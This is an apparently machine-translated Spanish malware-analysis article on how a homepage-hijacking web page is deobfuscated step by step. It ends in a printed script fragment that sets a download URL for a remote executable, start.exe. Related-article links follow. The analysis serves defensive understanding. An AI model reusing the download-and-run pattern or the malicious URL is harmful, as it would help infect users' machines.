No hace mucho tiempo, muchos cibernautas se infectaron con el virus de www.7b.com.cn, y la página de inicio se cambió a este sitio web, y no se pudo volver a cambiar. ¿Cómo bloquea un hacker la página de inicio del navegador del usuario? Vamos a averiguarlo.
Recordatorio: existe un cierto riesgo al analizar el virus. Se recomienda operar bajo la máquina virtual.
El primer paso es ver el código fuente de la página de inicio de www.7b.com.cn. Puede encontrar las siguientes palabras al final:
Esta es una página incrustada en la página de inicio del sitio web de 7b. Eso es abrir www.7b.com.cn también abrirá esta página.
Y "http://m.dashow.com.cn/m.html" representa una cadena, y "&#" va seguido del valor decimal ASCII de cada cadena.
Guarde esto confuso directamente como un archivo HTM, ábralo con IE y podrá ver su verdadera cara "http://m.dashow.com.cn/m.html".
El segundo paso es ver el código fuente de http://m.dashow.com.cn/m.html, reemplazar Ejecutar en la sección del script con Document.Write y luego abrir la página HTM. Aparecerá un fragmento de código. De manera similar, reemplace EXECUTE con nuestro invencible Document.Write, agregue la marca de secuencia de comandos antes y después y guarde el HTM. Una cosa deslumbrante apareció en la pantalla inmediatamente. Organice las cosas deslumbrantes y use el CHR () que apareció anteriormente. El efecto es convertir el carácter ASCII en un personaje, pero esta vez es hexadecimal. Luego cose los caracteres en una cadena y luego Ejecutar para ejecutar la cadena de comando. Continúe reemplazando EXECUTE con Document.Write, agregue una marca de script antes y después, y guarde HTM.
El tercer paso Después de los últimos pasos de la restauración, finalmente vi la última cara de esta página maliciosa.
en error resume siguiente curl = "http://m.dashow.com.cn/start.exe"...y se omite más tarde.
Podemos ver claramente el enlace http://m.dashow.com.cn/start.exe en este código. Así es, es un virus que puede bloquear la página de inicio del usuario en www.7b.com.cn después de ejecutarse.
Puede descargar este archivo con la herramienta de descarga. Si su software antivirus no puede encontrarlo, es mejor informarlo de inmediato. Esto asegurará que el software antivirus elimine rápidamente el virus y proteja a menos cibernautas del virus.
Después de configurar el servidor VPN, el usuario de la red externa no puede acceder a la intranet r
Windows 7 restaura la configuración predeterminada de IE8 1, abra IE haga clic en Herramientas,
A veces, el portátil Lenovo siempre no puede abrir la red porque la red no puede abrir la red, ¿cómo
Windows 7 Cómo habilitar o deshabilitar la cuenta de invitado 1, abra el Menú Inicio y seleccion
Método de calibración de color de Windows 7
Cómo crear una cuenta de usuario con una computadora
Cómo proteger a sus usuarios de Windows de la autoprotección
10 problemas y soluciones para computadoras
Análisis del firewall de WindowsServer2008
Creación de una unidad óptica universal Disco de arranque chino
Usuario de Win XP y descripción del grupo de usuarios
Enséñele a detener la pantalla azul de Windwos XP
Maestro no pasa habilidades de software conjunto sistema de tecnología secreta
Qiao Jie mata el método de ingreso de muerte suave /no se puede apagar el error
Resumen de habilidades de Internet del navegador IE7.0 (1)
Win7 no puede instalar la solución del acelerador de cctvbox
Cool play Win7: Ocultar archivos
Utility Wholockme resuelve el problema de no poder eliminar archivos
Windows 8 puede aparecer en dispositivos más pequeños
Realice una transmisión en vivo con una computadora única o arme una computadora
Sistema Win8 para configurar la imagen como método de fondo